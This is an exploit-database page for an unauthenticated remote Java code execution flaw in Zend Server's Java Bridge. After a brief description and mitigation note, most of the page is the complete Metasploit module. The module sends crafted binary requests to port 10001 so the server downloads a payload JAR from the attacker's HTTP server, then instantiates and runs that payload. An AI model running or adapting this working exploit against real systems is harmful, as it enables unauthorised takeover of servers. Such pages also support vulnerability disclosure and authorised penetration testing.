header-logo
Suggest Exploit
vendor:
Zend Server
by:
bannedit
7.5
CVSS
HIGH
Trust Relationship Issue
CWE
Product Name: Zend Server
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: java
2011

Zend Server Java Bridge Arbitrary Java Code Execution

This module takes advantage of a trust relationship issue within the Zend Server Java Bridge. The Java Bridge is responsible for handling interactions between PHP and Java code within Zend Server. When Java code is encountered Zend Server communicates with the Java Bridge. The Java Bridge then handles the java code and creates the objects within the Java Virtual Machine. This interaction however, does not require any sort of authentication. This leaves the JVM wide open to remote attackers. Sending specially crafted data to the Java Bridge results in the execution of arbitrary java code.

Mitigation:

Upgrade to a version that has patched this vulnerability or restrict access to the Java Bridge.
Source

Exploit-DB raw data:

##
# $Id: zend_java_bridge.rb 12242 2011-04-05 01:08:07Z swtornio $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::HttpServer
	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Zend Server Java Bridge Arbitrary Java Code Execution',
			'Description'    => %q{
					This module takes advantage of a trust relationship issue within the
				Zend Server Java Bridge. The Java Bridge is responsible for handling interactions
				between PHP and Java code within Zend Server. 
				
					When Java code is encountered Zend Server communicates with the Java Bridge. The
				Java Bridge then handles the java code and creates the objects within the Java Virtual
				Machine. This interaction however, does not require any sort of authentication. This
				leaves the JVM wide open to remote attackers. Sending specially crafted data to the
				Java Bridge results in the execution of arbitrary java code.
			},
			'Author'         => [ 'bannedit' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 12242 $',
			'References'     =>
				[
					[ 'OSVDB', '71420'],
					[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-113/'],
					[ 'URL', 'http://www.exploit-db.com/exploits/17078/' ],
				],
			'Platform'       => ['java'], # win
			'Arch'           => ARCH_JAVA,
			'Privileged'     => true,
			'Targets'        =>
				[
					[ 'Linux', {}],
					[ 'Windows', {}],
				],
			'DisclosureDate' => 'Mar 28 2011',
			'DefaultTarget' => 0))
			register_options( [ Opt::RPORT(10001) ], self.class)
	end

	def exploit
		start_service()
		send_java_require
	end
	
	def send_java_require()
		connect

		jar = rand_text_alpha(rand(8)+1) + '.jar'
		path = get_uri + '/' + jar
		uri_len = path.length
		java_require = [0xffffffff, 0x16000000].pack('V*') +
		"setAdditionalClassPath" + [0x01000000, 0x00000004].pack('V*') +
		[uri_len].pack('C') + path

		java_require = [java_require.length].pack('N') + java_require
 
		print_status("Sending java_require() request... #{path}")
		sock.put(java_require)
		res = sock.get_once
		
		select(nil, nil, nil, 5) # wait for the request to be handled
		create_and_exec
	end
	
	def create_and_exec
		print_status("Sending Final Java Bridge Requests")

		create_obj = 
			[0x34000000, 0x00000000, 0x0c000000].pack('V*') +
			"CreateObject" +
			[0x02000000, 0x00000004].pack('V*') + [0x12].pack('C') +
			"metasploit.Payload" +
			[0x07000000].pack('N') + [0x00].pack('C')

		sock.put(create_obj)
		res = sock.get_once
		obj_id = res[5,4]

		callmain = 
		[0x1f000000].pack('V') + obj_id + [0x04000000].pack('V') + "main" +
		[0x01000000, 0x00000008, 0x00000201, 0x00040000].pack('V*') + [0x00].pack('C') + 
		[0x00].pack('C') + [0x00].pack('C')

		sock.put(callmain)
		sock.get_once
		handler()
	end

	def on_request_uri(cli, request)
		if request.uri =~ /\.jar$/i
			send_response(cli, payload.encoded,
			{
				'Content-Type' => 'application/java-archive',
				'Connection'   => 'close',
				'Pragma'       => 'no-cache'
			})

			print_status("Replied to Request for Payload JAR")
		end
	end
end